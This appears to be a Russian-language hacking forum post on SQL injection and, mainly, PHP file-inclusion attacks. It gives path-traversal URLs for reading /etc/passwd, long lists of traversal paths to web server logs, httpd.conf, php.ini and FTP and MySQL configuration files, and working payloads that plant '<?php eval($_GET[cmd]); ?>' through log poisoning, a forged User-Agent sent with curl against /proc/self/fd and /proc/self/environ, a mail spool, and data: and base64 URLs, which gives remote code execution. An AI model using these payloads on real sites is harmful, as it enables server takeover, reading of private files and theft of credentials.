Иначе говоря, SQL - это универсальный инструмент, необходимый каждому кто регулярно работает с базами данных.



Внедрение своего запроса - SQL injection
Свои запросы можно внедрят из за того что отсутствует фильтрация (или плохая она) переменных скрипта.
Когда ты заходишь на сайт новостей, то чаще всего видишь адрес вида http://...../news.php?id=5
Цифра 5 означает номер новости. id - это название переменной. ТОесть переменная id = 5. Пхп скрипт news.php получает значение переменной id (5) и делает запрос к базе данных (Выбрать из базы новость с номером 5) и показывает новость пользователям сайта. Тоже самое может быть не с новостями а например с постами на форумах, или какие-то документы выводит сайт из базы данных.
Данные из переменной id могут вставляться в разные места в запросе. В большинстве случаев программисты вообще не проверяют что находиться в переменной и значение попадает в запрос к базе. А если ничего не фильтруется, то можно достать из базы не новость а пароль от панели управления сайтом например. Можно еще залить шелл или читать файлы, но для этого нужны специальные обстоятельства. Какие - расскажу ниже. SQL инекции очень часто встречаются даже на крупных сайтах.
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
4. PHP(PERL) INJECTION
__________________________________________________ ____

Наверняка ты часто встречал url вида

Код:
http://..../index.php?file=news.php
Разновидностей может быть масса (например ....file=news (без расширения)).
Что можно сказать про такой url?
Скрипту index.php передается имя файла в переменной file, который нужно подключить к index.php.

Как это выглядит?

Код:
Список файлов на сервере:
index.php - Основной скрипт
news.php - Скрипт новостей
contacts.php - Скрипт с контактами
header.html - html файл заголовка страницы (Шапка и меню обычно)
footer.php - html файл нижней части сайта (счетчики итд)
Теперь посмотрим на файл index.php

Код:
<?php
// Подключается файл header.html
// PHP не будет пытаться интерпретировать html как php команды т.к. не встретит
// <?php и ?> в header.php
// А если php не находит php дескрипторов (<?php и ?>) то текст из подключаемого
// файла просто выводиться в браузер.
include('header.html'); // Выведет в браузер содержимое файла header.html
....
// Подкючается файл, имя которого передано в GET переменной file
// file=news.php -> include('news.php');
// file=a.php -> include('a.php');
include($_GET['file']);
...
// Выводиться в браузер подвал сайта (счетчики итд)
include('footer.html');
?>
Вместо Include может быть require.

Что можно из этого извлечь?
Раз файл, имя которого в переменной file, подгружается в основной скрипт, то мы можем передать свое имя фала, и файл с этим именем подключиться в index.php
Например подключим файл news.php
Код:
http://.............index.php?file=news.php

Бывает 3 разных вида кода с инклудом:
1. Имя файла с расширение берется из переменной.
Код:
// ...........?file=a.php
include($_GET['file']);
//Станет Include('a.php');

2. Имя файла из переменной вставляется после имени папки.
Код:
include("pages/$_GET['file']");
В таком слечаи чтобы подключить файл который находиться выше папки pages, просто добавляем ../. Пример:
Код:
http://...........index.php?file=../config.php
Можно еще выше подняться и дотянуться до /etc/passwd нпример
Код:
http://...........index.php?file=../../../../../../../../etc/passwd
Колличесвто ../ опцианально. Необязательно 10 или 15. ../ в пути означает поднятие на верх на один этаж. А мы не знаем как глубоко находятся файлы сайта, поэтому мы на всякий случай пишем с запасом.

3. Значение из переменой вставляется ДО имени папки.
Код:
include("$_GET['razdel']/default/index.php");
В этом случаи поможет только удаленный иклуд.
Можно инклудить файлы , которые хранятся на хостинге ИЛИ с других сайтов.

Что нам это дает:

1. Можно прочитать файл /etc/passwd (В этом файле нет <?php и ?> поэтому он выведется в браузер)
Запрос будет такой http://....../index.php?file=../../../. ... etc/passwd
index.php
Код:
.......
.......
include('../../../../../../../../../../etc/passwd');
Можно другие файлы читать, например логи веб сервера. Зачем? А в логи мы можем писать текст.
В логи записываются все страницы сайта, к которым обращаются посетители. А если сделать вот так
Код:
http://...../a/<?php+system($_GET['cmd'])+?>

То в логи запишется то, что в адресной строке. А если мы прочитаем логи доступа , то пхп, встретив <?php ...... ?> выполнит php команду.
А какую команду мы записали? Выполнить команду из переменной с именем cmd.

Как же читать логи?
Чтобы читать логи, надо знать где они находються.
APACHE LOG
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Код:
Код:
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../apache2/logs/error.log
../apache2/logs/access.log
../../apache2/logs/error.log
../../apache2/logs/access.log
../../../apache2/logs/error.log
../../../apache2/logs/access.log
../../../../apache2/logs/error.log
../../../../apache2/logs/access.log
../../../../../apache2/logs/error.log
../../../../../apache2/logs/access.log
../logs/error.log
../logs/access.log
../../logs/error.log
../../logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/access.log
../../../../../../../../../../var/log/error_log
../../../../../../../../../../var/log/error.log
../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../opt/xampp/logs/access_log
../../../../../../../../../../opt/xampp/logs/error_log
../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../opt/xampp/logs/access.log
../../../../../../../../../../opt/xampp/logs/error.log
../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log
../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Код:
Код:
../../../../../../usr/local/apache/conf/httpd.conf
../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/apache/conf/httpd.conf
../../../../../../usr/local/etc/apache/conf/httpd.conf
../../../../../../etc/apache2/httpd.conf
../../../../../../../../../usr/local/apache/conf/httpd.conf
../../../../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../../../usr/local/apache/httpd.conf
../../../../../../../../usr/local/apache2/httpd.conf
../../../../../../../../usr/local/httpd/conf/httpd.conf
../../../../../../../usr/local/etc/apache/conf/httpd.conf
../../../../../../../usr/local/etc/apache2/conf/httpd.conf
../../../../../../../usr/local/etc/httpd/conf/httpd.conf
../../../../../../../usr/apache2/conf/httpd.conf
../../../../../../../usr/apache/conf/httpd.conf
../../../../../../../usr/local/apps/apache2/conf/httpd.conf
../../../../../../../usr/local/apps/apache/conf/httpd.conf
../../../../../../etc/apache/conf/httpd.conf
../../../../../../etc/apache2/conf/httpd.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/http/conf/httpd.conf
../../../../../../etc/apache2/httpd.conf
../../../../../../etc/httpd/httpd.conf
../../../../../../etc/http/httpd.conf
../../../../../../etc/httpd.conf
../../../../../opt/apache/conf/httpd.conf
../../../../../opt/apache2/conf/httpd.conf
../../../../var/www/conf/httpd.conf
../../../private/etc/httpd/httpd.conf
../../../private/etc/httpd/httpd.conf.default
../../Volumes/webBackup/opt/apache2/conf/httpd.conf
../../Volumes/webBackup/private/etc/httpd/httpd.conf
../../Volumes/webBackup/private/etc/httpd/httpd.conf.default
../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf
../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf
../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf
../../../../../../../../../usr/local/php/httpd.conf.php
../../../../../../../../../usr/local/php4/httpd.conf.php
../../../../../../../../../usr/local/php5/httpd.conf.php
../../../../../../../../../usr/local/php/httpd.conf
../../../../../../../../../usr/local/php4/httpd.conf
../../../../../../../../../usr/local/php5/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Можно найти php.ini
Код:
Код:
../../../../../../../../../etc/php.ini
../../../../../../../../../bin/php.ini
../../../../../../../../../etc/httpd/php.ini
../../../../../../../../../usr/lib/php.ini
../../../../../../../../../usr/lib/php/php.ini
../../../../../../../../../usr/local/etc/php.ini
../../../../../../../../../usr/local/lib/php.ini
../../../../../../../../../usr/local/php/lib/php.ini
../../../../../../../../../usr/local/php4/lib/php.ini
../../../../../../../../../usr/local/php5/lib/php.ini
../../../../../../../../../usr/local/apache/conf/php.ini
../../../../../../../../../etc/php4.4/fcgi/php.ini
../../../../../../../../../etc/php4/apache/php.ini
../../../../../../../../../etc/php4/apache2/php.ini
../../../../../../../../../etc/php5/apache/php.ini
../../../../../../../../../etc/php5/apache2/php.ini
../../../../../../../../../etc/php/php.ini
../../../../../../../../../etc/php/php4/php.ini
../../../../../../../../../etc/php/apache/php.ini
../../../../../../../../../etc/php/apache2/php.ini
../../../../../../../../../web/conf/php.ini
../../../../../../../../../usr/local/Zend/etc/php.ini
../../../../../../../../../opt/xampp/etc/php.ini
../../../../../../../../../var/local/www/conf/php.ini
../../../../../../../../../etc/php/cgi/php.ini
../../../../../../../../../etc/php4/cgi/php.ini
../../../../../../../../../etc/php5/cgi/php.ini
../../../../../../../../../php5\php.ini
../../../../../../../../../php4\php.ini
../../../../../../../../../php\php.ini
../../../../../../../../../PHP\php.ini
../../../../../../../../../WINDOWS\php.ini
../../../../../../../../../WINNT\php.ini
../../../../../../../../../apache\php\php.ini
../../../../../../../../../xampp\apache\bin\php.ini
../../../../../../../../../NetServer\bin\stable\apache\php.ini
../../../../../../../../../home2\bin\stable\apache\php.ini
../../../../../../../../../home\bin\stable\apache\php.ini
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini

Другие логи:
Код:
Код:
Cpanel:
*log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
*conf
/var/cpanel/cpanel.config

MySQL:
*log
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
*conf
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf


ProFTPD:
*log
/etc/logrotate.d/proftpd
/www/logs/proftpd.system.log
/var/log/proftpd
*conf
/etc/proftp.conf
/etc/protpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/proftpd/modules.conf

vsftpd:
*log
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
*conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers

wu-ftpd:
*log
/var/log/xferlog
/var/adm/log/xferlog
*conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers

Pure-FTPd:
*conf
/usr/sbin/pure-config.pl
/usr/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/etc/pure-ftpd.conf
-/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pure-ftpd/pureftpd.pdb
DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/
OpenBSD: /usr/ports/net/pure-ftpd/
NetBSD: /usr/pkgsrc/net/pureftpd/
Crux Linux: /usr/ports/contrib/pure-ftpd/
*log
/var/log/pure-ftpd/pure-ftpd.log
/logs/pure-ftpd.log
/var/log/pureftpd.log

Other:
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy
/var/log/ftplog
/etc/logrotate.d/ftp
/etc/ftpchroot
/etc/ftphosts
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Но если логи найти не удается, можно их найти через /proc/
В ОС Linux виртуальная файловая система /proc содержит файлы с текущей информацией о процессах и системе в целом. Файловая система создается в оперативной памяти компьютера в процессе загрузки и используется в качестве интерфейса обмена данными со структурами ядра. Использование файлов /proc/* в большинстве случаев позволяет избавиться от необходимости чтения и записи в устройство /dev/kmem. Большинство расположенных в структуре /proc файлов доступны пользователям только для чтения, а для записи требуют полномочий root. Файловая система /proc содержит множество каталогов с численными именами – эти каталоги создаются для каждого запущенного в системе процесса. Имя каталога определяется идентификатором (PID) соответствующего процесса. Каждый из таких каталогов содержит ряд подкаталогов файлов. Но этот каталог не всегда доступен для чтения.


Воспользуемся для наглядности curlом

Код:
curl "http://........../?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
../../../../proc/ - Каталог, в котором храниться информация о
../../../../proc/self/ - ссылка на текущий процесс
../../../../proc/self/fd/ - подкаталог, содержащий по одной символьной ссылке для каждого открытого процессом файла. Имя ссылки соответствует номеру файлового дескриптора для открытого файла, а сама ссылка указывает на открытый процессом файл.


Символьные ссылки в подкаталоге fd позволяют обманывать программы, которые в качестве входного файла не принимают stdin или в качестве выходного – stdout. В командной строке такой программы можно просто указывать /proc/self/fd/0 в качестве входного файла и в качестве выходного /proc/self/fd/1. Отметим, что предложенная хитрость не сработает для программ, использующих при файловых операциях команду seek, поскольку такие операции не поддерживаются для файлов стандартного ввода-вывода.

Файлы /proc/self/fd/N в Linux – это почти то же самое, что и файлы /dev/fd/N. Фактически, большинство сценариев MAKEDEV в Linux делает символьные ссылки /dev/fd на /proc/self/fd.


Код:
/proc/self/fd/0
/proc/self/fd/1
....................

"User-Agent: <?php eval(\$_GET[cmd]); ?>" - Подделываем юзерагент. В лог апача запишется юзерагнет и выполниться G_GET['cmd']

Пробуем подставлять разные цифры вместо N
Код:
curl "http://........../?page=../../../../../../../../proc/self/fd/N&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
Код:
curl "http://........../?page=../../../../../../../../proc/self/fd/0&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
Код:
curl "http://........../?page=../../../../../../../../proc/self/fd/1&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
Код:
curl "http://........../?page=../../../../../../../../proc/self/fd/2&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"
Код:
curl "http://........../?page=../../../../../../../../proc/self/fd/2..&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"

Допустим ссылка на лог апача (не важно аксес лог или ерор лог) это /proc/self/fd/3
Мы передаем юзерагент <?php eval(\$_GET[cmd]); ?> что означает выполнить пхп код, который в переменной $_GET[cmd] А в #_GET[cmd] мы передаем команду phpinfo();
Юзерагент запишется в лог апача, и выполниться, на экране мы увидим результат выполнения команды.


Еще один способ инклуда с /proc


/proc/self/environ - хранит переменной окружение. Опять же можно подделать юзерагнет.
Код:
curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();" -H "User-Agent: <?php eval(\$_GET[cmd]); ?>"




Мылим мыло
На многих сайтах есть регистрация. При регистрации указываем мыло вида NAME@localhost
где NAME - имя, под которым запущен веб сервер.
Высылаем себе письмо (забыли пароль/регистрируемся/...)
Нам нужно каким-то образом внедрить пхп код в тело письма. Это может быть ник или что-то еще
<?php eval($_GET[cmd]); ?>
Отправленное письмо будет лежать в /var/mail/NAME
Код:
http://....../index.php?page=../../../../../../../../var/mail/httpd&cmd=phpinfo()

Также можно много полезного узнать из
/proc/mounts
/proc/cpuinfo
/proc/self/loginuid
/etc/hosts

Протокол DATA
Протокол data включен ОЧЕНЬ редко! Почти никогда.
Для начало изучи немного RFC 2397
Условие:
allow_url_include = ON
Код:
http://.............../?page=data:,<?php eval($_REQUEST[cmd]); ?>&cmd=phpinfo();
Если же присутствуют какие-либо фильтры то можно закодировать в base64

Код:
http://................/?dir=data:;base64, PD9waHAgZXZhbCgkX1JFUVVFU1RbY21kXSk7ID8+&cmd=phpinfo();
 
Назад
Сверху